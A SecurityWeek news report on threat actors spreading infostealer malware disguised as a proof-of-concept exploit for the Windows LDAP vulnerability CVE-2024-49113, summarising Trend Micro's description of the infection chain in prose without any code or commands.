SECURITYWEEK NETWORK:

ICS:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Infostealer Masquerades as PoC Code Targeting Recent LDAP Vulnerability

A fake proof-of-concept (PoC) exploit for a recent LDAP vulnerability distributes information stealer malware.

Threat actors are distributing information stealer malware masquerading as proof-of-concept (PoC) exploit code targeting a recent Windows Lightweight Directory Access Protocol (LDAP) vulnerability.

Tracked as CVE-2024-49113 (CVSS score of 7.5) and leading to denial-of-service (DoS), the security defect was addressed on December 10 along with over 70 flaws, including a critical LDAP bug (CVE-2024-49112) that could lead to remote code execution (RCE).

Less than a month after patches were rolled out for the two issues, SafeBreach published PoC code targeting CVE-2024-49113, saying that it should be considered as important as the RCE flaw.

According to SafeBreach, which refers to CVE-2024-49113 as LDAPNightmare, the vulnerability can be abused to crash any unpatched Windows server, even those that are not Domain Controllers, if there is an internet-accessible DNS server.

Now, Trend Micro warns of a fake PoC exploit that lures security researchers into executing information stealer malware on their systems.

“Although the tactic of using PoC lures as vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims,” Trend Micro notes.

The PoC is distributed via a repository forked from the original and replaces the original Python files with an executable packed using UPX.

When executed, the fake PoC drops a PowerShell script in the system’s temporary folder. The script creates a scheduled task that executes an encoded script designed to download another script from Pastebin.

Advertisement. Scroll to continue reading.

The second script collects system information such as process list, directory list, IP addresses, network adapter information, and install updates, compresses it in a ZIP archive, and uploads it to an external FTP server.

Related: GFI KerioControl Firewall Vulnerability Exploited in the Wild

Related: Major Backdoor in Millions of RFID Cards Allows Instant Cloning

Related: Several Vulnerabilities Found in Popular File Sharing App SHAREit

Related: Researcher Warns 100,000 Devices Still Vulnerable to SMBGhost Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

More from

Latest News

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Webinar: CISO Forum 2025 Outlook – Session 1
January 29, 2025

Discover strategies for vendor selection, integration to minimize redundancies, and maximizing ROI from your cybersecurity investments. Gain actionable insights to ensure your stack is ready for tomorrow’s challenges.

Register

Webinar: CISO Forum 2025 Outlook – Session 2
February 5, 2025

Dive into critical topics such as incident response, threat intelligence, and attack surface management. Learn how to align cyber resilience plans with business objectives to reduce potential impacts and secure your organization in an ever-evolving threat landscape.

Register

People on the Move

The US arm of networking giant TP-Link has appointed Adam Robertson as Director of Information and Security.

Cyber exposure management firm Armis has promoted Alex Mosher to President.

Software giant Atlassian has named David Cross as its new CISO.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.